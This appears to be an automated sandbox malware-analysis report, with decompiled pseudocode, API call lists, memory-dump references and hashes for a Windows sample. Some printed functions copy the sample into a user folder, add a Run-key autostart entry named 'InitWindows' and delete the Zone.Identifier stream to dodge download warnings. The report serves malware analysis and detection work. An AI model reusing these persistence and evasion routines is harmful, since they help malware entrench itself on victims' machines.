                                      				}
                                      				_t18 = _t16 + 1;
                                      				_t20 =  *_t18;
                                      				if(_t20 == 0) {
                                      					L5:
                                      					_t1 = _t18 + 1; // 0x3
                                      					_t14 =  !=  ? _t18 : _t1;
                                      					_t16 =  !=  ? _t18 : _t1;
                                      					goto L11;
                                      				}
                                      				_t15 = _t20;
                                      				while(1) {
                                      					_t20 = _t15;
                                      					if(_t15 == 0x22) {
                                      						goto L5;
                                      					}
                                      					_t18 = _t18 + 1;
                                      					_t20 =  *_t18;
                                      					_t15 = _t20;
                                      					if(_t20 != 0) {
                                      						continue;
                                      					}
                                      					goto L5;
                                      				}
                                      				goto L5;
                                      			}

                                      APIs
                                      • GetCommandLineA.KERNEL32 ref: 00255871
                                      • GetStartupInfoA.KERNEL32(?), ref: 002558C0
                                      • GetModuleHandleA.KERNEL32(00000000), ref: 002558DC
                                      • ExitProcess.KERNEL32 ref: 002558F1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CommandExitHandleInfoLineModuleProcessStartup
                                      • String ID: ,`&
                                      • API String ID: 2164999147-2045151436
                                      • Opcode ID: 0f8db09f4be5f86d1bfb2ca7431e3cc31cb1f76d65ee485a2bfedf1eab54398e
                                      • Instruction ID: fad51ad3569db3e559cbe2e754c7691777136dea6c013e4007f4d8dfaf454ab2
                                      • Opcode Fuzzy Hash: 0f8db09f4be5f86d1bfb2ca7431e3cc31cb1f76d65ee485a2bfedf1eab54398e
                                      • Instruction Fuzzy Hash: AB014E24028D555FEB241F78A4AE2E83B5A9F07316F141098E985C7213C63B4CEF8A5D
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 25ebd4-25ec07 (calls GetModuleHandleA, GetProcAddress, IsWow64Process; node list omitted)
                                      C-Code - Quality: 40%
                                      			E0025EBD4(intOrPtr* __ecx) {
                                      				signed int _v8;
                                      				_Unknown_base(*)()* _t6;
                                      				intOrPtr* _t12;
                                      
                                      				_push(__ecx);
                                      				_v8 = _v8 & 0x00000000;
                                      				_t12 = __ecx;
                                      				_t6 = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
                                      				if(_t6 != 0) {
                                      					 *_t6( *_t12,  &_v8); // executed
                                      				}
                                      				return _v8;
                                      			}

                                      APIs
                                      • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,0025DC08,?,?,00252BBD,?,00262608,?,?,00000000,?), ref: 0025EBE9
                                      • GetProcAddress.KERNEL32(00000000,?,0025DC08,?,?,00252BBD,?,00262608,?,?,00000000,?), ref: 0025EBF0
                                      • IsWow64Process.KERNEL32(?,00000000,?,0025DC08,?,?,00252BBD,?,00262608,?,?,00000000,?), ref: 0025EC00
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressHandleModuleProcProcessWow64
                                      • String ID: IsWow64Process$kernel32
                                      • API String ID: 1818662866-3789238822
                                      • Opcode ID: 83d17d8ea097c33d72840b4f1078eea81333bbee4d7552a5329b27e9e1de0d75
                                      • Instruction ID: 45b1a784e822205707da9e2bae52a9f99b224ede230f945666cdfefaae2f8592
                                      • Opcode Fuzzy Hash: 83d17d8ea097c33d72840b4f1078eea81333bbee4d7552a5329b27e9e1de0d75
                                      • Instruction Fuzzy Hash: B3E08C71610204FBDB28AB94ED0EB9E76BCEB02352B204588F506E2180DAB4EB14C6A4
                                      Uniqueness

                                      Uniqueness Score: 2.28%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 23002d-230466 (calls 230467 * 6, GetNativeSystemInfo, VirtualAlloc, LoadLibraryA, GetProcAddress, 260e1e, VirtualProtect; node list omitted)
                                      APIs
                                      • GetNativeSystemInfo.KERNEL32(?,?,?,?,00230005), ref: 002300EB
                                      • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,00230005), ref: 00230113
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424063177.00230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocInfoNativeSystemVirtual
                                      • String ID:
                                      • API String ID: 2032221330-0
                                      • Opcode ID: 473b58f7a167e2a1e580efbb33301050c8c34e0b7915a5bdb1048dcc05cabd4f
                                      • Instruction ID: 8400531d4e859b795de2b68d5a8155b9afe1dc6f3f63c2ca614c803666e302fa
                                      • Opcode Fuzzy Hash: 473b58f7a167e2a1e580efbb33301050c8c34e0b7915a5bdb1048dcc05cabd4f
                                      • Instruction Fuzzy Hash: 56E1D0B1A143068FDB24CF69C8E472AB3E0FF94308F18456DE9859B241E774ED65CBA1
                                      Uniqueness

                                      Uniqueness Score: 2.84%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 25db97-25dbf2 (calls GetCurrentProcess, OpenProcessToken, GetTokenInformation, CloseHandle; node list omitted)
                                      C-Code - Quality: 100%
                                      			E0025DB97() {
                                      				void* _v8;
                                      				long _v12;
                                      				void _v16;
                                      				long _t21;
                                      				void* _t22;
                                      
                                      				_t22 = 0;
                                      				_v8 = 0;
                                      				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v8) != 0) {
                                      					_t21 = 4;
                                      					_v12 = _t21;
                                      					GetTokenInformation(_v8, 0x14,  &_v16, _t21,  &_v12); // executed
                                      					_t22 =  !=  ? _v16 : 0;
                                      				}
                                      				if(_v8 != 0) {
                                      					CloseHandle(_v8); // executed
                                      				}
                                      				return 0 | _t22 != 0x00000000;
                                      			}

                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000008,00000000,?,?,?,00000000), ref: 0025DBA9
                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,00000000), ref: 0025DBB0
                                      • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,00000000), ref: 0025DBCE
                                      • CloseHandle.KERNEL32(00000000), ref: 0025DBE3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                      • String ID:
                                      • API String ID: 215268677-0
                                      • Opcode ID: 229e792119cab149fe86b53375ac612e76efc751ff740b38e3b3adabaed8460c
                                      • Instruction ID: 8fa358a739c52c026860c1883f57eb0053e8f79d7aa2d537132ff5bf3140dbd5
                                      • Opcode Fuzzy Hash: 229e792119cab149fe86b53375ac612e76efc751ff740b38e3b3adabaed8460c
                                      • Instruction Fuzzy Hash: A8F0E771A00618FBDB119FA0AD09BDEBBBCEF04745F118065E901A60A0D7709E58DA90
                                      Uniqueness

                                      Uniqueness Score: 0.13%

                                      Control-flow Graph

                                      C-Code - Quality: 96%
                                      			E0025F0C8(intOrPtr* __ecx, void* __eflags, WCHAR* _a4, char _a8) {
                                      				WCHAR* _v8;
                                      				char _v12;
                                      				char _v16;
                                      				char _v20;
                                      				void* _t49;
                                      				void* _t52;
                                      				void* _t61;
                                      				void* _t67;
                                      				void* _t73;
                                      				void* _t79;
                                      				int _t82;
                                      				int _t91;
                                      				char* _t95;
                                      				intOrPtr* _t131;
                                      				WCHAR** _t135;
                                      				void* _t136;
                                      				void* _t138;
                                      
                                      				_t138 = __eflags;
                                      				_t131 = __ecx;
                                      				E0025D425( &_v8); // executed
                                      				_t130 = 0xa;
                                      				_t95 =  &_v20;
                                      				E002532D4(_t95, _t130, _t138); // executed
                                      				_push(_t95);
                                      				_push(_t95);
                                      				_t49 = E0025EF0C(_t131, _t95, _t131 + 0x10); // executed
                                      				E0025EF4C(_t131);
                                      				_t91 = 0;
                                      				if(_t49 == 0) {
                                      					L4:
                                      					_t133 = _t131 + 0x10;
                                      					goto L5;
                                      				} else {
                                      					_t140 = _a4;
                                      					if(_a4 == 0) {
                                      						goto L4;
                                      					} else {
                                      						_t130 =  *((intOrPtr*)(_t131 + 0xc));
                                      						_t135 = _t131 + 0x20;
                                      						_t73 = E0025D75B( &_v12,  *((intOrPtr*)(_t131 + 0xc)), _t140); // executed
                                      						E00253264(_t135, _t73); // executed
                                      						E0025D70F(E00255A2D(_v12), _t135);
                                      						E0025345A( &_v12, _t131 + 0x4c); // executed
                                      						_t79 = E00253297(_t135,  *((intOrPtr*)(_t131 + 0xc)), _t140, "\\"); // executed
                                      						E00253162(_t79, _t140,  &_v12); // executed
                                      						_t123 = _v12;
                                      						E00255A2D(_v12);
                                      						_t82 = CopyFileW(_v8,  *_t135, 0); // executed
                                      						if(_t82 != 0) {
                                      							_t124 = _t135;
                                      							E0025304E(_t135, _t130, _t136);
                                      							E002554A5(_t131 + 0x30, _t130, _t136);
                                      							E00255C32( &_v16, _t130, _t124, _t124, _t123, _t123);
                                      							_t133 = _t131 + 0x10;
                                      							E0025EFFE(_t131, 0x80000001, _t131 + 0x10, 0xf003f, 0); // executed
                                      							E0025EFCB(_t131, _t131 + 0x18,  &_v16, 3); // executed
                                      							E00252E66( &_v16);
                                      							L5:
                                      							if( *_t131 == _t91) {
                                      								E0025EFFE(_t131, 0x80000001, _t133, 0xf003f, _t91);
                                      							}
                                      							if(_a8 == _t91) {
                                      								L13:
                                      								E00253412( &_a4,  *(_t131 + 0x20)); // executed
                                      								_t52 = E00253412( &_a8, L":Zone.Identifier"); // executed
                                      								E00253162( &_a4, _t146, _t52); // executed
                                      								E00255A2D(_a8);
                                      								DeleteFileW(_a4); // executed
                                      								_t91 = 1;
                                      								E00255A2D(_a4);
                                      							} else {
                                      								if(_a4 == _t91) {
                                      									E00253264(_t131 + 0x20,  &_v8);
                                      								}
                                      								_t61 = E0025EFFE(_t131 + 4,  *((intOrPtr*)(_t131 + 8)), _t131 + 0x14, 0x20006, _t91); // executed
                                      								if(_t61 != 0) {
                                      									E0025345A( &_a4, _t131 + 0x54); // executed
                                      									_t67 = E0025EFCB(_t131 + 4,  &_a4, E00252E0A( &_v16, _t130, _t131 + 0x20), 1); // executed
                                      									E00255A2D(_a4);
                                      									E00252E66( &_v16);
                                      									_t146 = _t67;
                                      									if(_t67 != 0) {
                                      										E0025EF4C(_t131 + 4);
                                      										goto L13;
                                      									}
                                      								}
                                      							}
                                      						}
                                      					}
                                      				}
                                      				E00255A2D(_v20);
                                      				E00255A2D(_v8);
                                      				return _t91;
                                      			}

                                      APIs
                                        • Part of subcall function 0025D425: GetModuleFileNameW.KERNEL32(00000000,00000000,000003E8,?,00000000,?,?,0025F41F,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,InitWindows), ref: 0025D444
                                        • Part of subcall function 0025EF0C: RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000001,00000001,00000000,?,00000000,?,?,?,0025F0F4,?,?), ref: 0025EF2C
                                        • Part of subcall function 0025EF4C: RegCloseKey.KERNEL32(?,?,0025F043,?,0025F392,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,InitWindows,00000000,inst,?), ref: 0025EF56
                                      • DeleteFileW.KERNEL32(?,00000000,:Zone.Identifier,?,?,?,?,?,?,?,00000000,?,?,00261336,?,?), ref: 0025F283
                                        • Part of subcall function 0025D75B: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 0025D78C
                                        • Part of subcall function 00253264: lstrcpyW.KERNEL32(00000000,00000000), ref: 00253289
                                        • Part of subcall function 00255A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0025E2AE,?,?,?,?,?,00000000), ref: 00255A35
                                        • Part of subcall function 0025D70F: SHCreateDirectoryExW.SHELL32(00000000,?,00000000), ref: 0025D715
                                        • Part of subcall function 0025345A: lstrcpyW.KERNEL32(00000000,?), ref: 00253484
                                        • Part of subcall function 00253162: lstrcatW.KERNEL32(00000000,?), ref: 00253192
                                      • CopyFileW.KERNEL32(?,?,00000000), ref: 0025F166
                                        • Part of subcall function 0025EFFE: RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,0025F392,80000001,?), ref: 0025F032
                                        • Part of subcall function 0025EFFE: RegOpenKeyExW.KERNEL32(?,?,00000000,?,?,?,?,?,?,0025F392,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\), ref: 0025F04D
                                        • Part of subcall function 0025EFCB: RegSetValueExW.KERNEL32(?,?,00000000,?,?,?,?,?,0025F239,?,00000000,?,00000001,?,?,?), ref: 0025EFEA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                       • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                       • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                       • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                       • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile$lstrcpy$CloseCopyDeleteDirectoryFolderFreeModuleNameOpenPathSpecialValueVirtuallstrcat
                                      • String ID: :Zone.Identifier
                                      • API String ID: 1638721540-2436405130
                                      • Opcode ID: 22130c31ce9e20d46a2dd74087551b198e20e4e58633fb594949187bcb69bd84
                                      • Instruction ID: 6c49a8b1fcc5c0a2e7ca148bd497597a998255205b3797567a32768becde6de3
                                      • Opcode Fuzzy Hash: 22130c31ce9e20d46a2dd74087551b198e20e4e58633fb594949187bcb69bd84
                                      • Instruction Fuzzy Hash: 76515171620519BBCB09EF60CD92CEEB729BF54342B008129BD1656592EF30AF6DCF94
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                       Control-flow Graph
                                       • Graph for 12e8fdb-12e91d4 (rendered control-flow graph omitted; the basic blocks call 12e8b66, 12e8bd9, 12e1c5e, 12e1f70, 12e8b28 and 12e8c3e, and invoke GetACP, IsValidCodePage and GetCPInfo)
                                      APIs
                                        • Part of subcall function 012E8B66: GetOEMCP.KERNEL32(00000000,012E8DED,?,012E4B35,013B2144,013B2144,012E4B35), ref: 012E8B91
                                      • GetACP.KERNEL32(00000000,FFF475FF,?,?,?,012E8E34,?,00000000,?,?,?,?,?,?,013B2144,012E4B35), ref: 012E904A
                                      • IsValidCodePage.KERNEL32(-00000030,00000000,FFF475FF,?,?,?,012E8E34,?,00000000,?,?,?,?,?,?,013B2144), ref: 012E905C
                                      • GetCPInfo.KERNEL32(00000000,012E8E34,?,?,012E8E34,?,00000000,?,?,?,?,?,?,013B2144,012E4B35), ref: 012E906F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                       • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp
                                       • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp
                                       • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp
                                       • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp
                                       • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp
                                       • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp
                                       • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: CodeInfoPageValid
                                      • String ID:
                                      • API String ID: 546120528-0
                                      • Opcode ID: abf6ef5c1e8c046c2aac923f6d009fdc0c9ef98f804b2df3b0070c076dea8d22
                                      • Instruction ID: e2f7db147bbf9be969f6a971d2ee0627df3d2dd7f8eee87d5f201bf197655aca
                                      • Opcode Fuzzy Hash: abf6ef5c1e8c046c2aac923f6d009fdc0c9ef98f804b2df3b0070c076dea8d22
                                      • Instruction Fuzzy Hash: 4D5144709202069FDF258F2AC89C6BABFE5AF11308F94442FC2868B142E275D1858B91
                                      Uniqueness

                                      Uniqueness Score: 2.59%

                                      C-Code - Quality: 91%
                                      			E00252ECA(char** __ecx, void* __eflags, intOrPtr* _a4) {
                                      				char** _v8;
                                      				short* _t15;
                                      				void* _t19;
                                      				int _t39;
                                      
                                      				_push(__ecx);
                                      				_v8 = __ecx;
                                      				 *_a4 = 0;
                                      				if(E00252EB9(__ecx) > 0) {
                                      					_t39 = MultiByteToWideChar(0, 2,  *__ecx, E00252EB9(__ecx) + 2, 0, 0) + _t14;
                                      					_t15 = E002559AA(_t39);
                                      					_t26 = _t15;
                                      					E00252EB9(_v8);
                                      					MultiByteToWideChar(0xfde9, 0,  *_v8, 0xffffffff, _t15, _t39);
                                      					_t19 = E00253412( &_v8, _t15); // executed
                                      					E00253264(_a4, _t19); // executed
                                      					E00255A2D(_v8);
                                      					E00255A2D(_t26);
                                      				}
                                      				return _a4;
                                      			}

                                      APIs
                                        • Part of subcall function 00252EB9: lstrlenA.KERNEL32(00000000,00252EE1,?,00000000,00000000,;3%,00253109,;3%,00000000,-00000001,?,?,0025333B,00000000,?,?), ref: 00252EC0
                                      • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,-00000002,00000000,00000000,?,00000000,00000000,;3%,00253109,;3%,00000000,-00000001,?), ref: 00252EF7
                                        • Part of subcall function 002559AA: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,0025320F,?,?,002555DF,.bss,00000000,?,?,00000000), ref: 002559B8
                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,?,0025333B,00000000,?,?,?,00000000), ref: 00252F22
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,00000000,?,0025FC61,00000000,?,00000000), ref: 0025341B
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,?,0025FC61,00000000,?,00000000), ref: 00253432
                                        • Part of subcall function 00253412: lstrcpyW.KERNEL32(?,0025FC61), ref: 0025344D
                                        • Part of subcall function 00253264: lstrcpyW.KERNEL32(00000000,00000000), ref: 00253289
                                        • Part of subcall function 00255A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0025E2AE,?,?,?,?,?,00000000), ref: 00255A35
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                       • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                       • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                       • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                       • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$ByteCharMultiVirtualWidelstrcpy$AllocFree
                                      • String ID: ;3%
                                      • API String ID: 4006399363-1745904148
                                      • Opcode ID: 348a72d729fd0123bf3413aa56c4a5fd27198e9a5b7a153cb758d36738194ec2
                                      • Instruction ID: 49740614cd517adbbbb1deafda025e41a262f1f65dddb1582fc16fe096643fd6
                                      • Opcode Fuzzy Hash: 348a72d729fd0123bf3413aa56c4a5fd27198e9a5b7a153cb758d36738194ec2
                                      • Instruction Fuzzy Hash: 3801B571620524FBCB00EBE4DC97D9E76AC9F0A351B104165F905DB292CAB49E188FD8
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      APIs
                                      • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,?), ref: 012E8C63
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                       • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp
                                       • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp
                                       • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp
                                       • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp
                                       • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp
                                       • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp
                                       • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: Info
                                      • String ID:
                                      • API String ID: 1807457897-3916222277
                                      • Opcode ID: 29c3335fc99f19eae2587e9038746ec1bcf7d6aad23cc93d90ea8784aa2fc53e
                                      • Instruction ID: 769b5f6d83b0fcb9f92e98240fd2784a5b181430f1c1e42dbbf65f8c64509523
                                      • Opcode Fuzzy Hash: 29c3335fc99f19eae2587e9038746ec1bcf7d6aad23cc93d90ea8784aa2fc53e
                                      • Instruction Fuzzy Hash: 2341587051434C9EDF268F288C88BFABBEDEB15304F5404EDE6CA86102D2369A45CF60
                                      Uniqueness

                                      Uniqueness Score: 0.05%

                                      C-Code - Quality: 100%
                                      			E0025EB77(void** __ecx, void* __eflags, WCHAR** _a4, WCHAR** _a8) {
                                      				struct _PROCESS_INFORMATION _v20;
                                      				struct _STARTUPINFOW _v88;
                                      				int _t12;
                                      				void** _t22;
                                      
                                      				_t22 = __ecx;
                                      				E00251052( &_v88, 0, 0x44);
                                      				_v88.cb = 0x44;
                                      				_t12 = CreateProcessW( *_a4,  *_a8, 0, 0, 0, 0, 0, 0,  &_v88,  &_v20); // executed
                                      				if(_t12 == 0) {
                                      					return 0;
                                      				}
                                      				 *_t22 = _v20.hProcess;
                                      				return 1;
                                      			}

                                      APIs
                                      • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 0025EBB2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                       • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                       • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                       • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                       • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateProcess
                                      • String ID: D
                                      • API String ID: 963392458-2746444292
                                      • Opcode ID: 0b955e4f358d59c021cf7890f2efdccf9d290389475ddf6e408e3b8dd94180ab
                                      • Instruction ID: ae4797349df23059b844b1c7ebbfee37a2f299b913b15a0552239436255412fb
                                      • Opcode Fuzzy Hash: 0b955e4f358d59c021cf7890f2efdccf9d290389475ddf6e408e3b8dd94180ab
                                      • Instruction Fuzzy Hash: D5F036B1510149AFDB00DFD4DC85DAB77BCFB44749B108425EA069B144E6B49D188764
                                      Uniqueness

                                      Uniqueness Score: 0.30%

                                      APIs
                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 012E663F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                       • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp
                                       • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp
                                       • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp
                                       • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp
                                       • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp
                                       • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp
                                       • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: CountCriticalInitializeSectionSpin
                                      • String ID: InitializeCriticalSectionEx
                                      • API String ID: 2593887523-3084827643
                                      • Opcode ID: 9fe00cdcee5c36a10cce7bff9ad90b9d335f7abc9c80c65e69b921cadf952f1c
                                      • Instruction ID: f7b4a3494dd500b064f672beaffda906e47f2c94e20ea84fa2bc375d2685d502
                                      • Opcode Fuzzy Hash: 9fe00cdcee5c36a10cce7bff9ad90b9d335f7abc9c80c65e69b921cadf952f1c
                                      • Instruction Fuzzy Hash: 58F09035650208BBCB266F55DC19CAEBFE5EB14714F404059F91956250DE7249209BC0
                                      Uniqueness

                                      Uniqueness Score: 0.05%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                       • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp
                                       • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp
                                       • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp
                                       • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp
                                       • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp
                                       • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp
                                       • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp
